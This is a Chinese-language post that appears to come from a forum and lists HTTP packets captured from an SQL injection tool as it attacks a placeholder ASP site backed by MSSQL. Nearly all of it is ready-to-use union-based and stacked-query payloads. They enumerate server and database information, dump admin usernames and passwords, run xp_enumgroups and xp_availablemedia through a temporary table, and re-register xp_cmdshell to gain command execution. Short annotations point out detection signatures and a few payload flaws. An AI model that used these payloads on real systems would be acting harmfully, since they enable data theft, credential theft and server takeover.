穿山甲MSSQL注射抓包(部分)


作者:TheLostMind

看了下穿山甲,很牛X的工具,抓了下包,随便整理了以下,无聊时看看……下面是对一个 GET 型整数注入点(MSSQL)的完整抓包顺序:先判列数,再找能回显的字符串列,然后逐项取服务器信息、库名、表、列和数据,最后是恢复 xp_cmdshell / sp_OA 和列磁盘。
===============================================
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2

抓包内容(先用 union all select null,… 逐个增加 null 来确定列数,到 14 列时页面正常;随后把 0x6161…(48 个 'a')依次放到第 1、第 2 列,找出能作为字符串回显的列——这里是第 2 列,后面所有取数据的 payload 都把结果放在第 2 列):

union all select null-- and 1=1

union all select null,null-- and 1=1

union all select null,null,null-- and 1=1

这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast

(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar

(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

获取综合信息(注意工具把所有字符串都按 UTF-16LE 十六进制传入以避开引号:0x730079007300610064006d0069006e00 = N'sysadmin',0x640062005f006f0077006e0065007200 = N'db_owner'。写 WAF/IDS 规则时,这种 0x 开头的 nvarchar 十六进制串配合 is_srvrolemember / is_member / @@version 是很稳定的特征):

and 1=2 union all select null,cast(@@version as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(db_name() as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(@@servername as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(system_user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(user as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


这里省略……………………(sysdatabases 逐行取到 top 40 为止)。下面改用堆叠查询(分号分隔的多条语句):先在目标库里建一张表 foofoofoo,把 xp_availablemedia / xp_enumgroups 的输出 insert 进去再逐行读出,读完 drop 掉。这要求目标的数据库驱动允许一次执行多条语句,而且会在目标库留下 DDL 痕迹——foofoofoo 这个固定表名本身就是一个很好的检测特征。

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as

nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename

from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1


;drop table foofoofoo;-- and 1=1


;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1


;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1

;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1

;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1

and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as

nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top

1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1

;drop table foofoofoo;-- and 1=1


获取表(xtype=char(85) 即 'U',只取用户表;[sky_yanjiusuo] 应为前面用 db_name() / sysdatabases 枚举到的库名):
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

xtype=char(85) and status>0--

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--


and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

这里省略………………

and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15

id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--

获取列(0x73006b0079005f005500730065007200 = N'sky_User';先按表名查出 object id 2068202418,再用 syscolumns 按 colid 逐列取名,共 11 列):
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where

name=0x73006b0079005f005500730065007200--

and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where

id=2068202418--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top

11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--

获取内容:

and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--

and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--


and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id

from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top

2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--

and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select

top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--


恢复XP_CMDSHELL(先用 serverproperty(N'productversion') 的第一个字符是否 >8 来判断版本:'8' 是 SQL Server 2000。注意这里只截取了一个字符,10.x / 11.x 这类版本会得到 '1',所以这个判断对 2008 及以后的版本并不可靠。随后的 sp_addextendedproc N'xp_cmdshell', N'xplog70.dll' 是 2000 时代重新注册扩展存储过程的做法;2005 以后 xp_cmdshell 由 sp_configure 开关控制,这种注册方式一般不起作用):

and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),

1, 1)>8


;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,

0x780070006c006f006700370030002e0064006c006c00--


恢复SP_OA……(0x730070005f004f004100430072006500610074006500 = N'sp_OACreate';注意抓到的 DLL 参数仍是 xplog70.dll,而 sp_OA* 通常由 odsole70.dll 提供,这条在目标上大概率注册不成功,以实际回显为准)
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,

0x780070006c006f006700370030002e0064006c006c00--


列磁盘(再次走 foofoofoo 临时表读 xp_availablemedia;抓到的 "order by [name] group by name" 在 T-SQL 里 GROUP BY 必须写在 ORDER BY 之前,按原样发送会报语法错误,怀疑是工具或抓包整理时的问题):
;drop table foofoofoo;--

;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--


;insert foofoofoo exec master.dbo.xp_availablemedia;--


and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar

(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from

foofoofoo order by [name] group by name) t order by [name] desc)t--

;drop table foofoofoo;--


不抓了。。。。自己抓吧………………
==============================================
